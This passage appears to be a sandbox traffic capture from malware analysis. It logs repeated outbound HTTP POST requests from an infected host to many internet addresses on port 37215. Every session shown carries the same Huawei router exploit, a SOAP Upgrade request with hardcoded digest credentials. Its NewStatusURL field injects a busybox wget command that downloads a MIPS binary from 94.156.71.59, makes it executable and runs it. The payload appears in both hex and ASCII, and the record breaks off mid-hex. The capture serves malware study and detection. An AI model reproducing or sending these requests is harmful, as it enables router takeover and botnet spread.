                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            69192.168.2.1333796156.205.253.5337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.929860115 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            70192.168.2.1332834156.249.70.24337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.930929899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            71192.168.2.1337610156.89.39.23137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.931967020 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            72192.168.2.135310041.97.23.9237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.933051109 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            73192.168.2.1356460156.32.132.9337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.933965921 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            74192.168.2.1356378156.60.90.19937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.934919119 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            75192.168.2.1338508156.67.226.8237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.935899973 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            76192.168.2.1347918197.192.210.17137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.936836958 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            77192.168.2.1351088156.185.143.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.937774897 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            78192.168.2.1345636197.11.121.19937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.938714981 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 